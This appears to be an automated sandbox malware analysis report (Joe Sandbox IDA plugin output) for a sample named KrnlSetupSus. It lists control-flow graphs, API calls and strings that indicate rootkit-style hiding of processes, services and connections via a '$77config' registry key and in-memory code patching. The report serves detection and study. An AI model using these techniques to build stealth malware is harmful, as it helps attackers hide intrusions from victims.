                                                                                                                                    • Part of subcall function 1C561264: GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56126A
                                                                                                                                    • Part of subcall function 1C561264: HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561279
                                                                                                                                    • Part of subcall function 1C561264: GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561293
                                                                                                                                    • Part of subcall function 1C561264: HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5612A4
                                                                                                                                    • Part of subcall function 1C561000: GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561006
                                                                                                                                    • Part of subcall function 1C561000: HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561015
                                                                                                                                    • Part of subcall function 1C561000: GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561028
                                                                                                                                    • Part of subcall function 1C561000: HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561037
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617AE
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617DB
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617F5
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561815
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561830
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561850
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56186B
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56188B
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618A6
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618C6
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618E1
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561901
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56191C
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56193C
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561957
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561977
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561992
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56199C
                                                                                                                                    • Part of subcall function 1C5612B8: RegQueryInfoKeyW.ADVAPI32 ref: 1C561315
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C561323
                                                                                                                                    • Part of subcall function 1C5612B8: HeapAlloc.KERNEL32 ref: 1C561334
                                                                                                                                    • Part of subcall function 1C5612B8: RegEnumValueW.ADVAPI32 ref: 1C561393
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C5613DB
                                                                                                                                    • Part of subcall function 1C5612B8: HeapAlloc.KERNEL32 ref: 1C5613E9
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C561406
                                                                                                                                    • Part of subcall function 1C5612B8: HeapFree.KERNEL32 ref: 1C561414
                                                                                                                                    • Part of subcall function 1C5612B8: lstrlenW.KERNEL32 ref: 1C56141D
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C56142B
                                                                                                                                    • Part of subcall function 1C5612B8: HeapAlloc.KERNEL32 ref: 1C561439
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                  • String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                  • API String ID: 2135414181-649645306

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CA6
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CD4
                                                                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CF6
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D11
                                                                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D32
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                  • String ID: wr
                                                                                                                                  • API String ID: 1092925422-2678910430

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C56606B
                                                                                                                                  • GetThreadContext.KERNEL32 ref: 1C5661D5
                                                                                                                                    • Part of subcall function 1C565E60: GetCurrentThreadId.KERNEL32 ref: 1C565E64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                                                                                  • String ID: \\?\
                                                                                                                                  • API String ID: 2719912262-4282027825
                                                                                                                                  • Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction ID: b80881e4d4410e6ad6be45f7ddb002afc08451a11bad4a298b7c5b79ce8a5b85
                                                                                                                                  • Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction Fuzzy Hash: 0EF0FF72314B8592F7208F65F994B9A7321F744B98FC44024DA4946974DF6CD6DDCB10

Control-flow Graph

control_flow_graph 247 1c5655d0-1c5655fc 248 1c5655fe-1c565606 247->248 249 1c56560d-1c565616 247->249 248->249 250 1c565627-1c565630 249->250 251 1c565618-1c565620 249->251 252 1c565632-1c56563a 250->252 253 1c565641-1c56564a 250->253 251->250 252->253 254 1c565656-1c565661 GetCurrentThreadId 253->254 255 1c56564c-1c565651 253->255 257 1c565663-1c565668 254->257 258 1c56566d-1c565674 254->258 256 1c565bd3-1c565bda 255->256 257->256 259 1c565676-1c56567c 258->259 260 1c565681-1c56568a 258->260 259->256 261 1c565696-1c5656a2 260->261 262 1c56568c-1c565691 260->262 263 1c5656a4-1c5656c9 261->263 264 1c5656ce-1c565725 call 1c565be0 * 2 261->264 262->256 263->256 269 1c565727-1c56572e 264->269 270 1c56573a-1c565743 264->270 271 1c565736 269->271 272 1c565730 269->272 273 1c565755-1c56575e 270->273 274 1c565745-1c565752 270->274 276 1c5657a6-1c5657aa 271->276 275 1c5657b0-1c5657b6 272->275 277 1c565773-1c565798 call 1c567d60 273->277 278 1c565760-1c565770 273->278 274->273 279 1c5657e5-1c5657eb 275->279 280 1c5657b8-1c5657d4 call 1c564890 275->280 276->275 286 1c56579e 277->286 287 1c56582d-1c565842 call 1c5641c0 277->287 278->277 283 1c565815-1c565828 279->283 284 1c5657ed-1c56580c call 1c567d9c 279->284 280->279 290 1c5657d6-1c5657de 280->290 283->256 284->283 286->276 294 1c565844-1c56584c 287->294 295 1c565851-1c56585a 287->295 290->279 294->276 296 1c56586c-1c5658ba call 1c573ea0 295->296 297 1c56585c-1c565869 295->297 300 1c5658c2-1c5658ca 296->300 297->296 301 1c5659d7-1c5659df 300->301 302 1c5658d0-1c5659bb call 1c567940 300->302 303 1c565a23-1c565a2b 301->303 304 1c5659e1-1c5659f4 call 1c564a90 301->304 314 1c5659bf-1c5659ce call 1c564560 302->314 315 1c5659bd 302->315 307 1c565a37-1c565a46 303->307 308 1c565a2d-1c565a35 303->308 316 1c5659f6 304->316 317 1c5659f8-1c565a21 304->317 312 1c565a4f 307->312 313 1c565a48 307->313 308->307 311 1c565a54-1c565a61 308->311 319 1c565a64-1c565ab9 call 1c573800 311->319 320 1c565a63 311->320 312->311 313->312 324 1c5659d2 314->324 325 1c5659d0 314->325 315->301 316->303 317->301 326 1c565abb-1c565ac3 319->326 327 1c565ac8-1c565b61 call 1c564a10 call 1c564970 VirtualProtect 319->327 320->319 324->300 325->301 332 1c565b63-1c565b68 GetLastError 327->332 333 1c565b71-1c565bd1 327->333 332->333 333->256
APIs
• GetCurrentThreadId.KERNEL32 ref: 1C565656
Memory Dump Source
• Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
• Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 3b6ea0c9ec3a41bea84a83f99c8ab7fc11bd436f4a9bfc2efbcd1bef4c2adc93
• Instruction ID: 412786bd2a83ae33c30d7b3ab0d009a9ccff6c91b5ccf6a64fb4781a298bf8a8
• Opcode Fuzzy Hash: 3b6ea0c9ec3a41bea84a83f99c8ab7fc11bd436f4a9bfc2efbcd1bef4c2adc93
• Instruction Fuzzy Hash: CDF1E436659B94C6DB60CB5AF49075ABBA1F3C4B98F500116EACE87B68DF7CC484CB10

Control-flow Graph

control_flow_graph 506 1c563ee0-1c563f01 call 1c564130 509 1c563f06-1c563f10 506->509 510 1c563f16-1c563f22 509->510 511 1c563ffa 509->511 513 1c563f44-1c563f6e call 1c573ea0 VirtualQuery 510->513 514 1c563f24-1c563f30 510->514 512 1c563ffc-1c564000 511->512 518 1c563f75-1c563f7d 513->518 519 1c563f70 513->519 514->513 515 1c563f32-1c563f42 514->515 515->509 520 1c563f7f-1c563f88 518->520 521 1c563fdd-1c563ff0 call 1c564130 518->521 519->511 520->521 522 1c563f8a-1c563fb0 VirtualAlloc 520->522 529 1c563ff5 521->529 524 1c563fb2-1c563fb7 522->524 525 1c563fbb-1c563fc5 GetLastError 522->525 524->512 527 1c563fc7-1c563fc9 525->527 528 1c563fcb-1c563fdb 525->528 527->512 528->529 529->509
APIs
Memory Dump Source
• Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
• Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: Virtual$AllocQuery
• String ID:
• API String ID: 31662377-0
• Opcode ID: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
• Instruction ID: 48b0f38c848e374eb724ece31695ecaebb1ef0c55f48c826e118977c32d0b96c
• Opcode Fuzzy Hash: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
• Instruction Fuzzy Hash: 29211032619A94C1DB21CB19E45034BE7B1F3C8B84F500A29F6CD46F69EF7CC2848B14

Control-flow Graph

control_flow_graph 530 1c5637ec-1c5637f6 531 1c563873-1c563875 530->531 532 1c5637f8-1c56380d GetModuleFileNameW 530->532 535 1c563877 call 1c563be4 531->535 536 1c56387c 531->536 533 1c56386f-1c563871 532->533 534 1c56380f-1c563824 PathFindFileNameW call 1c563d4c 532->534 537 1c563881-1c563888 533->537 534->533 541 1c563826-1c56382d call 1c563c98 534->541 535->536 536->537 541->533 544 1c56382f-1c563836 541->544 544->536 545 1c563838-1c563868 CreateThread call 1c561e38 544->545 547 1c56386d 545->547 547->536
APIs
• GetModuleFileNameW.KERNEL32 ref: 1C563805
• PathFindFileNameW.SHLWAPI ref: 1C563814
  • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
  • Part of subcall function 1C563C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CA6
  • Part of subcall function 1C563C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CD4
  • Part of subcall function 1C563C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CF6
  • Part of subcall function 1C563C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D11
  • Part of subcall function 1C563C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D32
• CreateThread.KERNEL32 ref: 1C56385B
  • Part of subcall function 1C561E38: GetCurrentThread.KERNEL32 ref: 1C561E43
Memory Dump Source
• Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
• Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
• Instruction ID: ac0ca67941d68659c455c4c87654330b0bfe4c78cc259fa5490d8be49b68b4ce
• Opcode Fuzzy Hash: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
• Instruction Fuzzy Hash: E101A734A15B5182F7109766E408BDE36B2BB94B88FC04229C40682E62EF7CD0C8C720

Control-flow Graph

control_flow_graph 548 1c5652f0-1c56530a GetCurrentProcess 549 1c56531a-1c565320 548->549 550 1c565322-1c565351 VirtualProtect FlushInstructionCache 549->550 551 1c565353-1c565357 549->551 552 1c56530c-1c565315 550->552 552->549
APIs
• GetCurrentProcess.KERNEL32 ref: 1C5652F4
• VirtualProtect.KERNEL32 ref: 1C565337
• FlushInstructionCache.KERNEL32 ref: 1C56534C
Memory Dump Source
• Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
• Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: CacheCurrentFlushInstructionProcessProtectVirtual
• String ID:
• API String ID: 3733156554-0
• Opcode ID: 4aba7460b6388bb063bfeaf383c5b8a18be15a6e4565ce49ea7add9aa0a15a9e
• Instruction ID: 41a38381edba69328d72880e50af7dce0bed47e2be849902a14b09485af5f086
• Opcode Fuzzy Hash: 4aba7460b6388bb063bfeaf383c5b8a18be15a6e4565ce49ea7add9aa0a15a9e
• Instruction Fuzzy Hash: F3F0DA7A229B18C0C620DB11E45074BA7A0F3C8BE8F545116EACD07F28DE78C2848B64
APIs
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: 76c11d0b30f0e94a4c5c0a6fcd8ab7fd5dde85d61ab92be67f73c5428060264b
• Instruction ID: 1c1d9fe7926684c82ee1faf4d1c47404701e9f52262629013a599eadddee645e
• Opcode Fuzzy Hash: 76c11d0b30f0e94a4c5c0a6fcd8ab7fd5dde85d61ab92be67f73c5428060264b
• Instruction Fuzzy Hash: 6771167190CA5C8FDB59EF68D8456FABBE0EF65321F04427BE009C3292CB656816CB81
APIs
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID: CriticalProcess
• String ID:
• API String ID: 2695349919-0
• Opcode ID: 641da5bcff61a567e12354b0d293d9599ebe25814804cc294ef799e76f5ffc85
• Instruction ID: 35c4a7a41cf77779b99c28161858c188f09d6d3ee99d6c635ffec5f50723df39
• Opcode Fuzzy Hash: 641da5bcff61a567e12354b0d293d9599ebe25814804cc294ef799e76f5ffc85
• Instruction Fuzzy Hash: 3F51257190CB888FD719EF68C8556EABBF0FF55310F0445AEE08AC3192DB28A846C791
APIs
  • Part of subcall function 1C561724: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56172F
  • Part of subcall function 1C561724: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56173E
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617AE
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617DB
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617F5
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561815
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561830
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561850
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56186B
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56188B
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618A6
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618C6
• SleepEx.KERNEL32 ref: 1C561BDB
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618E1
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561901
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56191C
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56193C
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561957
  • Part of subcall function 1C561724: RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561977
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561992
  • Part of subcall function 1C561724: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56199C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 948135145-0
                                                                                                                                  • Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction ID: 9f45c5f1cb24319468b66594ac903ac1bc4aeab4a57b4b987dae51970d9a234c
                                                                                                                                  • Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction Fuzzy Hash: 3A212C79301A6181FB009BA7DA507BF7365FBA8BC4F115821CE0AA7B54DF24D4948734
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction ID: 1c82fc42dad0aa3433ebdb077a6760a1f26ddba34ce324f8a61972f4a9234e44
                                                                                                                                  • Opcode Fuzzy Hash: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction Fuzzy Hash: 66D01235731A40C3F300DB12E845BD56329F398701FD04005E94A82694DF7CC2D9CB50
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32 ref: 1C56828C
                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C5682B9
                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C5682D3
                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C568314
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C568368
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C568385
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C568390
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
